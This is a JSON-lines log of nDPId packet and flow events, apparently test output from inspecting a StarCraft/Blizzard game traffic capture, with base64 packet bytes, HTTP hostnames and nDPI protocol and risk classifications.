-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964790,"flow_last_seen":1437389964790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389964790,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1437389964790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964790,"pkt":"hCYVPnXEIImEa8W6CABFAAA0FwlAAIAG67fAqAFkV\/jd\/g20AFApaAewAAAAAIAC\/\/838QAAAgQFtAEDAwgBAQQC"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1437389964848,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964848,"pkt":"IImEa8W6hCYVPnXECABFAAA0tGpAAPUG2VVX+N3+wKgBZABQDbTA0NjuKWgHsYAS\/\/+fJQAAAgQFtAEDAwQEAgAA"} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1437389964848,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389964848,"pkt":"hCYVPnXEIImEa8W6CABFAAAoFwpAAIAG68LAqAFkV\/jd\/g20AFApaAexwNDY71AQBADa8wAA"} -00998{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389964790,"flow_last_seen":1437389964848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1437389964848,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"llnw.blizzard.com","url":"llnw.blizzard.com\/sc2-pod-retail\/AF11CD00\/EU\/24621.direct\/s2-36281-BA356DD57557728843CAF63A12C79AA3.mfil","code":0,"content_type":"","user_agent":"Blizzard Web Client"}} 
-01158{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437389964790,"flow_last_seen":1437389964921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1647,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1437389964921,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"llnw.blizzard.com","url":"llnw.blizzard.com\/sc2-pod-retail\/AF11CD00\/EU\/24621.direct\/s2-36281-BA356DD57557728843CAF63A12C79AA3.mfil","code":200,"content_type":"application\/octet-stream","user_agent":"Blizzard Web Client"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389967432,"flow_last_seen":1437389967432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389967432,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1437389967432,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389967432,"pkt":"hCYVPnXEIImEa8W6CABFAAA0U2dAAIAG+pjAqAFkDIHeNg24AFDXJA2NAAAAAIACIACvkgAAAgQFtAEDAwgBAQQC"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1437389967630,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389967630,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAAC0GoQAMgd42wKgBZABQDbj6JMXG1yQNjoASFtD4xgAAAgQFtAEBBAIBAwMH"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1437389967630,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389967630,"pkt":"hCYVPnXEIImEa8W6CABFAAAoU2hAAIAG+qPAqAFkDIHeNg24AFDXJA2O+iTFx1AQAQBPaQAA"} -00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389967432,"flow_last_seen":1437389967639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1437389967639,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"us.scan.worldofwarcraft.com","url":"us.scan.worldofwarcraft.com\/update\/Launcher.txt","code":0,"content_type":"","user_agent":""}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968486,"flow_last_seen":1437389968486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968486,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1437389968486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968486,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaD9AAIAGnzjAqAFkAuQuaA2kAbvjTIWjXKb5cVARAQDtEwAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEBAAIAGnzfAqAFkAuQuaA2hAbso9r9xF3ZyNlARAP06DgAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":247,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEFAAIAGnzbAqAFkAuQuaA2iAbuuMy\/9hNS6Y1ARAQCOtQAA"} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEJAAIAGnzXAqAFkAuQuaA2jAbuWFKpTUfGXQ1ARBFh\/KAAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWNAAIAG7grAqAFkAuQucg2aAbv4rJBdJdjUo1ARAP0omQAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWRAAIAG7gnAqAFkAuQucg2YAbs5x3Vg1+NhTFARAQDDxgAA"} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":251,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWVAAIAG7gjAqAFkAuQucg2ZAbvryQjoVlrkVFARAQB8vAAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWZAAIAG7gfAqAFkAuQucg2XAbvNUW978CZu3VARBF0M8QAA"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"199.38.164.156","src_port":3486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoPo5AAIAGjnLAqAFkxyaknA2eAbtl4GJo2w7rJVAR9fPuOQAA"} 
-00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968488,"flow_last_seen":1437389968488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968488,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3484,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1437389968488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968488,"pkt":"hCYVPnXEIImEa8W6CABFAAAobDZAAIAGrOrAqAFkrcJx4A2cAbsxkmlKz83WwVARAP18ZAAA"} -00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968519,"pkt":"IImEa8W6hCYVPnXECABFAABdOZFAADkGFKgC5C5ywKgBZAG7DZol2NSj+KyQXlAYAk8nagAAFQMCADAMud3SaYTsSqa\/uoo0a5E8VCc4Xkt3IWOikvjNzbZ6\/KN17SBOZ1wiAn+Wb8fZvA4="} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968519,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWdAAIAG7gbAqAFkAuQucg2aAbv4rJBeJdjU2FAUAAApXQAA"} -00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968519,"pkt":"IImEa8W6hCYVPnXECABFAABdHrRAADkGL4UC5C5ywKgBZAG7DZfwJm7dzVFvfFAYAvbMYQAAFQMCADAisnLQsHrL1EoW2shNoX67xhkXstAI1yd6wVWuICpme1diCl2In\/GtYthhkjE1BS4="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968519,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWhAAIAG7gXAqAFkAuQucg2XAbvNUW988CZvElAUAAARFQAA"} 
-00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968519,"pkt":"IImEa8W6hCYVPnXECABFAABdZwtAADkG5y0C5C5ywKgBZAG7DZlWWuRU68kI6VAYAk+37QAAFQMCADBkKOWBHzDl37wozuIxUqGksDGbpGilDaRqgrJ95jL33eBT4nQmWu5qzsKHkzuYbBI="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1437389968520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968520,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWlAAIAG7gTAqAFkAuQucg2ZAbvryQjpVlrkiVAUAAB9gwAA"} -00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1437389968520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968520,"pkt":"IImEa8W6hCYVPnXECABFAABdGMVAADkGNX4C5C5owKgBZAG7DaRcpvlx40yFpFAYAi2\/cgAAFQMCADCHvY3Mj+EIqhLZWr7xkOkCQpCu81AAuIN2GL29a+w7fDrgr\/wsC4qtrqrTilg07F0="} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1437389968520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968520,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEpAAIAGny3AqAFkAuQuaA2kAbvjTIWkXKb5plAUAADt2gAA"} -00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968521,"pkt":"IImEa8W6hCYVPnXECABFAABd0ZRAADkGfK4C5C5owKgBZAG7DaKE1LpjrjMv\/lAYAi2OuwAAFQMCADAOk8uVyOotmLX2HoTUFpC+IVWXwl6ab8qQjuO+KPoI4xJC+fUMLiJl2rPTnnO4+D0="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEtAAIAGnyzAqAFkAuQuaA2iAbuuMy\/+hNS6mFAUAACPfAAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"IImEa8W6hCYVPnXECABFAAAoCWgAADUGmrmtwnHgwKgBZAG7DZzPzdbBMZJpS1ARAXR77AAAAAAAAAAA"} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"hCYVPnXEIImEa8W6CABFAAAobDdAAIAGrOnAqAFkrcJx4A2cAbsxkmlLz83WwlAQAP18YwAA"} -00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968521,"pkt":"IImEa8W6hCYVPnXECABFAABdqvpAADkGo0gC5C5owKgBZAG7DaNR8ZdDlhSqVFAYAi3xwAAAFQMCADAv7rGxhq2HqkFRX8I5oUWALbAWkrPmznIlHUyodNC0DL7UHLBQOucKALsB4ikroko="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaExAAIAGnyvAqAFkAuQuaA2jAbuWFKpUUfGXeFAUAACDRwAA"} 
-00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1437389968525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968525,"pkt":"IImEa8W6hCYVPnXECABFAABd8QVAADkGXTMC5C5ywKgBZAG7DZjX42FMOcd1YVAYArORfwAAFQMCADAnMl10t6P0LqwYwp17IIJpYKwGMbTqEggZBxrTB\/KdrEJjLBHayLFZyNZHXp1TB8c="} 